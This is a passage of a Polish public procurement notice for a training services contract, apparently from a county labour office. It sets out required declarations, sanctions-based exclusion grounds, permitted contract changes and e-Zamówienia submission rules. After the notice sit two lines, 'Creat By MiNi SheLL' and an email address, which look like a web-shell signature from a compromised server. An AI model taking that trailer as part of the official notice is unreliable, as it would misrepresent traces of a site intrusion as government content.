podmiotów na zasadach określonych w art. 118 ustawy Pzp.&#34; 2) Zgodnie<br/>z pkt 9.9. SWZ: &#34;9.9. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118<br/>ustawy Pzp, przedstawia na wezwanie zamawiającego wraz z oświadczeniem wymienionym w pkt. 8.4.2 SWZ, oświadczenie<br/>podmiotu udostępniającego zasoby o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp,<br/>w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego w SWZ. Wzór oświadczenia określa załącznik<br/>nr 8 do SWZ.&#34;<br/>DODATKOWE INFORMACJE DOT. PODSTAW WYKLUCZENIA Z POSTĘPOWANIA: &#34;Z postępowania o udzielenie zamówienia<br/>wyklucza się wykonawcę w zakresie wskazanym w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2025r. poz.<br/>514) tj.:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu<br/>269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym<br/>mowa w art. 1 pkt 3 tej ustawy;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o<br/>przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz.U. z 2023 r. poz. 1124 z późn. zm.) jest osoba wymieniona w<br/>wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem<br/>rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 tej ustawy;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września<br/>1994 r. o rachunkowości (Dz.U. z 2023 r. poz. 120 z późn. zm.) jest podmiot wymieniony w wykazach określonych w rozporządzeniu<br/>765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile<br/>został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1<br/>pkt 3 tej ustawy.&#34; (patrz pkt 7.1.2. SWZ).<br/>Zgodnie z pkt 8.1.2. SWZ: &#34;8.1.2 W oświadczeniu, o którym mowa w pkt. 8.1 Wykonawca potwierdza także brak podstaw do<br/>wykluczenia z udziału w postępowaniu o udzielenie zamówienia określonych w pkt 7.1.2 SWZ. Zamawiający zastrzega sobie<br/>możliwość samodzielnej weryfikacji braku zaistnienia podstaw wykluczenia danego wykonawcy określonych w pkt 7.1.2 SWZ za<br/>pomocą ogólnodostępnych baz danych, w szczególności wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego.&#34;<br/>Szczegółowe wymagania dotyczące podmiotowych środków dowodowych określa SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż<br/>5 dni od dnia wezwania) następujących podmiotowych środków dowodowych i oświadczeń (aktualnych na dzień złożenia): Zgodnie z pkt 8.4. 1. SWZ: &#34;W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>1) W zakresie wskazanym w pkt 6.1.4 ppkt 1) SWZ Wykonawca zobowiązany będzie do złożenia wykazu usług wykonanych, w<br/>okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te<br/>usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów - oświadczenie wykonawcy. Wykaz należy przygotować według wzoru określonego w załączniku nr 6 do SWZ.<br/>2) W zakresie wskazanym w pkt 6.1.4 ppkt 2) SWZ Wykonawca zobowiązany będzie do złożenia wykazu osób, skierowanych przez<br/>wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na<br/>temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz należy<br/>przygotować według wzoru określonego w załączniku nr 7 do SWZ.&#34;<br/>W przypadku, o którym mowa w pkt 6.2 i pkt 6.3 SWZ wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (art. 117 ust. 4 ustawy Pzp). Oświadczenie<br/>należy złożyć wg wymogów załącznika nr 5 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>Zgodnie z pkt 9.4. SWZ: &#34;Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z<br/>ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.&#34;<br/>Szczegółowe wymagania dotyczące podmiotowych środków dowodowych określa SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedłożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W rozdziale 12 SWZ zamawiający określił, iż oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1) Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 2 do SWZ;<br/>2) Oświadczenie, o którym mowa w pkt 8.1 SWZ tj. o niepodleganiu wykluczeniu i spełnianiu warunków udziału w<br/>postępowaniu (Załącznik nr 3 do SWZ);<br/>3) Oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby<br/>(Załącznik nr 4 do SWZ) (jeżeli dotyczy);<br/>4) Oświadczenie, o którym mowa w pkt 8.3 SWZ tj. oświadczenie Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, z którego wynika, które usługi wykonają poszczególni wykonawcy (Załącznik nr 5 do SWZ) (jeżeli dotyczy);<br/>5) Zobowiązanie lub inne dokumenty, o których mowa w pkt 9.4 SWZ (jeżeli dotyczy).<br/>6) Potwierdzenie umocowania do działania w imieniu wykonawcy lub podmiotu udostępniającego zasoby:<br/>a) zamawiający w celu potwierdzenia, że osoba działająca w imieniu wykonawcy lub podmiotu udostępniającego zasoby jest<br/>umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego,<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>b) wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a),<br/>jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane<br/>umożliwiające dostęp do tych dokumentów.<br/>c) jeżeli w imieniu wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w lit a), zamawiający żąda od wykonawcy lub podmiotu<br/>udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania wykonawcy.<br/>7) Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>(jeżeli dotyczy).<br/>Pełnomocnictwo (jeżeli dotyczy) - musi być załączone do oferty i przekazane zamawiającemu:<br/>- w formie elektronicznej tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym przez osobę<br/>upoważnioną do reprezentowania wykonawcy,<br/>lub<br/>- w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę upoważnioną do<br/>reprezentowania wykonawcy.<br/>Pełnomocnictwo sporządza się w postaci elektronicznej w formatach danych określonych w przepisach wydanych na<br/>podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne<br/>(Dz.U. 2024 poz. 1557 z późn. zm.), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, z<br/>uwzględnieniem rodzaju przekazywanych danych.<br/>Jeżeli pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem,<br/>przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci<br/>papierowej. Poświadczenia dokonuje mocodawca. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w<br/>postaci papierowej może dokonać również notariusz. Cyfrowe odwzorowanie pełnomocnictwa nie może być uwierzytelnione<br/>przez pełnomocnika.<br/>Wykonawca ma obowiązek załączyć do oferty opis programu szkolenia zgodnie ze wzorem stanowiącym Załącznik Nr 9 do SWZ. Program szkolenia stanowi integralną część oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) Oświadczenie, o którym mowa w pkt. 8.1 SWZ składa z ofertą każdy<br/>z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>2) W przypadku, o którym mowa w pkt 6.2 i pkt 6.3 SWZ wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (art. 117 ust. 4 ustawy<br/>Pzp). Oświadczenie należy złożyć wg wymogów załącznika nr 5 do SWZ. Oświadczenie to jest podmiotowym środkiem<br/>dowodowym.<br/>3) Zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe i oświadczenia, o których mowa<br/>w pkt. 8.4 SWZ, przy czym podmiotowe środki dowodowe i oświadczenie, o których mowa:<br/>a) w pkt. 8.4.1 SWZ składa odpowiednio wykonawca/wykonawcy, który/którzy wykazuje/ą spełnienie warunku udziału w<br/>postępowaniu,<br/>b) w pkt. 8.4.2 SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać<br/>przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy na podst. art. 454–455 ustawy Pzp oraz<br/>postanowień Projektu umowy, który stanowi zał. nr 10 do SWZ. Zgodnie z §9 ust 2-4 projektu umowy: &#34;2. Strony<br/>dopuszczają wprowadzenie następujących zmian umowy zgodnie z art. 455 ust. 1 pkt 1 ustawy Pzp: 1)	terminu wykonania zamówienia o czas niezbędny do jego prawidłowej realizacji – w przypadku niezrekrutowania grupy uczestników szkolenia z przyczyn niezależnych od Zamawiającego, np. braku osób zainteresowanych uczestnictwem w szkoleniu, rezygnacji osób zakwalifikowanych; <br/>2)	harmonogramu szkolenia – w przypadku wystąpienia zdarzeń uniemożliwiających realizację dotychczasowego harmonogramu lub jego zmiany celem usprawnienia realizacji szkolenia. Zakres wprowadzanych zmian nie może być sprzeczny z opisem przedmiotu zamówienia;<br/>3)	ceny - w przypadku niezrekrutowania całej grupy uczestników szkolenia, <br/>w szczególności braku osób zainteresowanych uczestnictwem w szkoleniu, rezygnacji osób zakwalifikowanych, wówczas wynagrodzenie Wykonawcy może zostać pomniejszone proporcjonalnie o liczbę osób niebiorących udziału <br/>w szkoleniu z zastrzeżeniem §3 ust. 1;<br/>4)	numeru rachunku bankowego – w przypadku konieczności zmiany numeru rachunku bankowego na nowy rachunek bankowy;<br/>5)	osób wykonujących zamówienie – w sytuacjach losowych w szczególności wskutek długotrwałej choroby lub innych zdarzeń losowych uniemożliwiających osobom wskazanym do realizacji zamówienia przeprowadzenia zajęć. W takim przypadku Wykonawca zobowiązany jest do przedstawienia Zamawiającemu w formie pisemnej, faksem lub drogą elektroniczną powodów uniemożliwiających osobom wskazanym do realizacji zamówienia wykonania usługi oraz informacji na temat wykształcenia, kwalifikacji zawodowych i doświadczenia nowych osób. Nowe osoby wyznaczone przez Wykonawcę do realizacji umowy muszą spełniać warunki określone w SWZ oraz przyjęte do oceny w ramach kryteriów oceny ofert. Warunkiem dopuszczenia nowych osób realizujących zadania w ramach umowy jest akceptacja przez Zamawiającego oraz spełnianie przez te osoby kryteriów przyjętych do oceny ofert w taki sposób iż zmiana osoby w kadrze nie będzie skutkowała obniżeniem liczby punktów, które uzyska Wykonawca w ramach oceny ofert w prowadzonym postępowaniu o udzielenie zamówienia publicznego. Zmiana może dotyczyć wszystkich osób wykonujących zamówienie;<br/>6)	miejsca wykonania zamówienia – w przypadku wystąpienia w trakcie szkolenia zdarzeń losowych w szczególności powodzi, pożaru, awarii, usterek technicznych w miejscu odbywania szkolenia uniemożliwiających prowadzenie zajęć (w szczególności brak zasilania w energię elektryczną, awarie wodno-kanalizacyjne) pod warunkiem że warunki lokalowe zaproponowane przez Wykonawcę będą spełniać warunki określone przez Zamawiającego w opisie przedmiotu zamówienia; zmiana może dotyczyć wszystkich miejsc i adresów zamówienia;<br/>7)	materiałów szkoleniowych w przypadku braku możliwości zakupu wymaganej ilości podręczników, wstrzymania przez dane wydawnictwo druku pozycji książkowej wskazanej przez Wykonawcę pod warunkiem że nowe materiały przedłożone przez Wykonawcę będą spełniać warunki określone przez Zamawiającego w opisie przedmiotu zamówienia a ich cena nie ulegnie zmianie; zmiana może dotyczyć wszystkich materiałów szkoleniowych;<br/>8)	zmiany obowiązujących przepisów prawa w tym m.in. związane z wejściem <br/>w życie ustawy z dnia 20 marca 2025r. o rynku pracy i służbach zatrudnienia.<br/>3.Zmiany mogą być wprowadzone na wniosek Zamawiającego lub Wykonawcy zgłoszony drugiej stronie przed<br/>wprowadzeniem zmian. Zmiany wymagają uprzedniego jej zaakceptowania przez strony umowy. 4. Strony dopuszczają<br/>również zmiany w przypadkach i na zasadach określonych w art. 454 ust. 2 ustawy Pzp innych niż wskazane w ust. 2 umowy.&#34; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy e-Zamówienia dostępnej pod adresem wskazanym w pkt. 1.2 SWZ: https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-68066f8f-99f7-4fc7-a8b1-a127386dee2b</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-13 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wymagania techn. i org. dot. korespondencji elektronicznej c.d.<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy<br/>do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie<br/>tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 250 MB (wielkość ta<br/>dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego poprzez formularz udostępniony na stronie internetowej<br/>https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za<br/>pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres<br/>e-mail: zamowienia@pupbilgoraj.pl (nie dotyczy składania ofert).<br/>Za datę przekazania oferty, wniosków zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na Platformę e-Zamówienia.<br/>OPIS SPOSOBU PRZYGOTOWANIA I SKŁADANIA OFERTY<br/>Wykonawca może złożyć tylko jedną ofertę. Złożenie więcej niż jednej oferty spowoduje odrzucenie wszystkich ofert<br/>złożonych przez Wykonawcę.<br/>Składanie ofert dostępne jest tylko dla użytkowników będących Wykonawcami posiadającymi rolę „Składanie<br/>ofert/wniosków/prac konkursowych”. Treść oferty musi być zgodna z wymaganiami Zamawiającego określonymi w<br/>dokumentach zamówienia. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej (tj. w postaci elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego<br/>2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2024 r. poz. 1557 z późn. zm.), z<br/>zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych.<br/>Zamawiający preferuje w szczególności następujące formaty przesłanych danych: .pdf, .docx, zip. Wykonawca sporządza<br/>ofertę w języku polskim na Formularzu ofertowym – zgodnie z załącznikiem nr 2 do SWZ udostępnionym przez<br/>Zamawiającego na Platformie e-Zamówienia i zamieszczonym w podglądzie postępowania w zakładce „Informacje<br/>podstawowe”. Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania<br/>po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty<br/>umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”)<br/>służące do dodawania plików. Wykonawca dodaje wybrany z dysku i uprzednio podpisany „Formularz oferty” w pierwszym<br/>polu („Wypełniony formularz oferty”). W kolejnym polu („Załączniki i inne dokumenty przedstawione w ofercie przez<br/>Wykonawcę”) Wykonawca dodaje pozostałe pliki stanowiące ofertę lub składane wraz z ofertą.<br/>Pozostałe informacje zostały wskazane w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com